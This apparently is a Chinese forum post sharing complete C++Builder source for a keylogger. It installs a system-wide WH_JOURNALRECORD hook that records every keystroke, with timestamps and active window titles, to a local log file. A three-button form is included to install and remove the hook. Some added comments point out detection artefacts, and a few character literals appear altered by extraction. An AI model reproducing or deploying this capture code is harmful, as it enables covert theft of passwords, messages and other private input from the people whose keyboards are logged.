日志钩子代码如下,你慢慢品味吧:
// Form unit of a C++Builder (VCL) application. This part holds the includes,
// the forward declaration of the journal-record hook procedure, and the
// file-level state that the hook code in this file reads and writes.
// The listing's line breaks were lost in extraction; they are restored here
// without changing any code token.
//-----------.cpp file
//---------------------------------------------------------------------------
#include <vcl.h>
#include <stdio.h>
#pragma hdrstop

#include "KeyHookU.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TfrmLogHook *frmLogHook;

// Hook procedure passed to SetWindowsHookEx; declared here, defined further down.
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam);

//hook handle (NULL while no hook is installed)
HHOOK g_hLogHook=NULL;
//handle of the window that had focus last time
HWND g_hLastFocus=NULL;
//key-state mask; compared against the GetKeyState() result for Shift
const int KeyPressMask=0x80000000;
//previous key value (declaration is commented out in the listing)
//char g_PrvChar;
//---------------------------------------------------------------------------
// Form constructor: only forwards Owner to TForm.
__fastcall TfrmLogHook::TfrmLogHook(TComponent* Owner)
    : TForm(Owner)
{
}
//---------------------------------------------------------------------------
// Install button handler: registers JournalLogProc as a WH_JOURNALRECORD hook
// (thread id 0, module HInstance) unless a hook handle is already stored.
// For analysis and detection, this SetWindowsHookEx call with
// WH_JOURNALRECORD is the install site of the input recorder.
// NOTE(review): Microsoft's documentation marks the journaling hooks as
// unsupported from Windows 11 on - confirm for the OS in scope.
void __fastcall TfrmLogHook::btnInstallClick(TObject *Sender)
{
    if(g_hLogHook==NULL)
        //install the journal hook
        g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalLogProc,HInstance,0);
}
//---------------------------------------------------------------------------
// Uninstall button handler: removes the hook if one is installed and clears
// the stored handle.
void __fastcall TfrmLogHook::btnUninstallClick(TObject *Sender)
{
    if(g_hLogHook!=NULL)
    {
        UnhookWindowsHookEx(g_hLogHook);
        g_hLogHook=NULL;
    }
}
//---------------------------------------------------------------------------
// Journal-record hook procedure.
//
// iCode  - hook code; values below 0 are passed straight to the next hook.
// wParam - forwarded to CallNextHookEx; also tested by the function-key switch.
// lParam - for HC_ACTION, cast to EVENTMSG* describing the recorded input event.
//
// What the visible code writes, and where (useful as host artefacts):
//   * On every HC_ACTION call the file named in the fopen() below is opened in
//     append mode and closed again before returning, so the recorder shows up
//     as repeated open/append/close activity on one fixed path.
//   * When the active window differs from the one seen last time, a record
//     header is written: newline (10), date/time string, two spaces (32),
//     window title, two spaces. This happens for WM_KEYDOWN and for
//     left/right mouse-button-down events.
//   * For WM_KEYDOWN the virtual-key code is translated to a character or a
//     bracketed tag such as "[TAB]" and appended.
// Several character literals ('/t', '/n', '//', '/'' and '/"') and the path
// string appear altered by extraction; they are reproduced as found.
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam)
{
    if(iCode<0)return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
    if(iCode==HC_ACTION)
    {
        EVENTMSG* pEvt=(EVENTMSG*)lParam;
        int i;
        HWND hFocus;//handle of the currently active window
        char szTitle[256];//title of the current window
        char szTime[128];//current date and time
        // Log file, append mode; opened once per hook call (closed below).
        FILE* stream=fopen("h://usr//logfile.txt","a+");
        if(pEvt->message==WM_KEYDOWN)
        {
            int vKey=LOBYTE(pEvt->paramL);//get the virtual-key code
            char ch;
            char str[10];
            hFocus=GetActiveWindow();
            // Window changed since the last event: write the record header.
            if(g_hLastFocus!=hFocus)
            {
                GetWindowText(hFocus,szTitle,256);
                g_hLastFocus=hFocus;
                strcpy(szTime,DateTimeToStr(Now()).c_str());
                fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
                fprintf(stream,"%c%c",32,32);
            }
            // Modifier state: 0x10 = Shift, 0x14 = Caps Lock, 0x90 = Num Lock.
            int iShift=GetKeyState(0x10);
            int iCapital=GetKeyState(0x14);
            int iNumLock=GetKeyState(0x90);
            // Shift uses the KeyPressMask bit; Caps Lock and Num Lock use bit 0.
            bool bShift=(iShift&KeyPressMask)==KeyPressMask;
            bool bCapital=(iCapital&1)==1;
            bool bNumLock=(iNumLock&1)==1;
            /*
            if(vKey==9) //TAB
                fprintf(stream,"%c",'/t');
            if(vKey==13) //Enter key
                fprintf(stream,"%c",'/n');
            */
            if(vKey>=48 && vKey<=57) //digit keys 0-9
            {
                if(!bShift)
                    fprintf(stream,"%c",vKey);
                else
                {
                    // Hard-coded shifted symbols for the digit row
                    // (presumably a US keyboard layout - confirm).
                    switch(vKey)
                    {
                        case 49: ch='!'; break;
                        case 50: ch='@'; break;
                        case 51: ch='#'; break;
                        case 52: ch='$'; break;
                        case 53: ch='%'; break;
                        case 54: ch='^'; break;
                        case 55: ch='&'; break;
                        case 56: ch='*'; break;
                        case 57: ch='('; break;
                        case 48: ch=')'; break;
                    }
                    fprintf(stream,"%c",ch);
                }
            }
            if(vKey>=65 && vKey<=90) //A-Z a-z
            {
                // Caps Lock off: Shift gives vKey, otherwise vKey+32.
                // Caps Lock on: the two cases are swapped.
                if(!bCapital)
                {
                    if(bShift)
                        ch=vKey;
                    else
                        ch=vKey+32;
                }
                else if(bShift)
                    ch=vKey+32;
                else
                    ch=vKey;
                fprintf(stream,"%c",ch);
            }
            if(vKey>=96 && vKey<=105) //numeric keypad 0-9
            {
                // Written as the digit character, and only while Num Lock is on.
                if(bNumLock)
                    fprintf(stream,"%c",vKey-96+48);
            }
            if(vKey>=186 && vKey<=222) //other keys
            {
                // Punctuation codes; 'n' from the default branch means
                // "nothing to write".
                switch(vKey)
                {
                    case 186: if (!bShift) ch=';' ; else ch=':' ; break;
                    case 187: if (!bShift) ch='=' ; else ch='+' ; break;
                    case 188: if (!bShift) ch=',' ; else ch='<' ; break;
                    case 189: if (!bShift) ch='-' ; else ch='_' ; break;
                    case 190: if (!bShift) ch='.' ; else ch='>' ; break;
                    case 191: if (!bShift) ch='/' ; else ch='?' ; break;
                    case 192: if (!bShift) ch='`' ; else ch='~' ; break;
                    case 219: if (!bShift) ch='['; else ch='{' ; break;
                    case 220: if (!bShift) ch='//' ; else ch='|' ; break;
                    case 221: if (!bShift) ch=']'; else ch='}' ; break;
                    case 222: if (!bShift) ch='/''; else ch='/"' ; break;
                    default: ch='n' ; break;
                }
                if (ch!='n' )
                    fprintf(stream,"%c",ch);
            }
            // NOTE(review): in the collapsed listing a bare "//" precedes this
            // "if"; it is read here as an empty comment line, but the "if" may
            // have been commented out in the original - confirm against the
            // original page.
            //
            if (vKey>=112 && vKey<=123) // function keys [F1]-[F12]
            {
                // The switch tests wParam, not vKey.
                switch(wParam)
                {
                    case 112: fprintf(stream,"%s","[F1]"); break;
                    case 113: fprintf(stream,"%s","[F2]"); break;
                    case 114: fprintf(stream,"%s","[F3]"); break;
                    case 115: fprintf(stream,"%s","[F4]"); break;
                    case 116: fprintf(stream,"%s","[F5]"); break;
                    case 117: fprintf(stream,"%s","[F6]"); break;
                    case 118: fprintf(stream,"%s","[F7]"); break;
                    case 119: fprintf(stream,"%s","[F8]"); break;
                    case 120: fprintf(stream,"%s","[F9]"); break;
                    case 121: fprintf(stream,"%s","[F10]"); break;
                    case 122: fprintf(stream,"%s","[F11]"); break;
                    case 123: fprintf(stream,"%s","[F12]"); break;
                }
            }
            if (vKey>=8 && vKey<=46) //arrow keys (and other editing/navigation keys)
            {
                // Copies a bracketed tag into str; ch is assigned only in the
                // default branch.
                switch (vKey)
                {
                    case 8: strcpy(str,"[BK]"); break;
                    case 9: strcpy(str,"[TAB]"); break;
                    case 13: strcpy(str,"[EN]"); break;
                    case 27: strcpy(str,"[ESC]"); break;
                    case 32: strcpy(str,"[SP]"); break;
                    case 33: strcpy(str,"[PU]"); break;
                    case 34: strcpy(str,"[PD]"); break;
                    case 35: strcpy(str,"[END]"); break;
                    case 36: strcpy(str,"[HOME]"); break;
                    case 37: strcpy(str,"[LF]"); break;
                    case 38: strcpy(str,"[UF]"); break;
                    case 39: strcpy(str,"[RF]"); break;
                    case 40: strcpy(str,"[DF]"); break;
                    case 45: strcpy(str,"[INS]"); break;
                    case 46: strcpy(str,"[DEL]"); break;
                    default: ch='n'; break;
                }
                if (ch!='n' )
                {
                    //if (g_PrvChar!=vKey)
                    //{
                    fprintf(stream,"%s",str);
                    // g_PrvChar=vKey;
                    //}
                }
            }
        }
        // Mouse button presses write only the window/time header, and only
        // when the active window changed.
        if(pEvt->message==WM_LBUTTONDOWN||pEvt->message==WM_RBUTTONDOWN)
        {
            hFocus=GetActiveWindow();
            if(g_hLastFocus!=hFocus)
            {
                g_hLastFocus=hFocus;
                GetWindowText(hFocus,szTitle,256);
                strcpy(szTime,DateTimeToStr(Now()).c_str());
                fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
                fprintf(stream,"%c%c",32,32);
            }
        }
        fclose(stream);
    }
    // Always hand the event on to the next hook in the chain.
    return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
}
// Exit button handler: removes the hook if one is installed, then closes the form.
void __fastcall TfrmLogHook::btnExitClick(TObject *Sender)
{
    if(g_hLogHook!=NULL)
    {
        UnhookWindowsHookEx(g_hLogHook);
        g_hLogHook=NULL;
    }
    Close();
}
// Header of the form unit. The #endif at the end has no matching #ifndef/#define
// in the listing as extracted.
//-----------.H file
#include <Classes.hpp>
#include <Controls.hpp>
#include <StdCtrls.hpp>
#include <Forms.hpp>
//---------------------------------------------------------------------------
// Form with three buttons: install the hook, uninstall it, exit.
class TfrmLogHook : public TForm
{
__published:    // IDE-managed Components
    TButton *btnInstall;
    TButton *btnUninstall;
    TButton *btnExit;
    void __fastcall btnInstallClick(TObject *Sender);
    void __fastcall btnUninstallClick(TObject *Sender);
    void __fastcall btnExitClick(TObject *Sender);
private:    // User declarations
public:     // User declarations
    __fastcall TfrmLogHook(TComponent* Owner);
};
//---------------------------------------------------------------------------
extern PACKAGE TfrmLogHook *frmLogHook;
//---------------------------------------------------------------------------
#endif
注:在Tfrom上加三个按钮.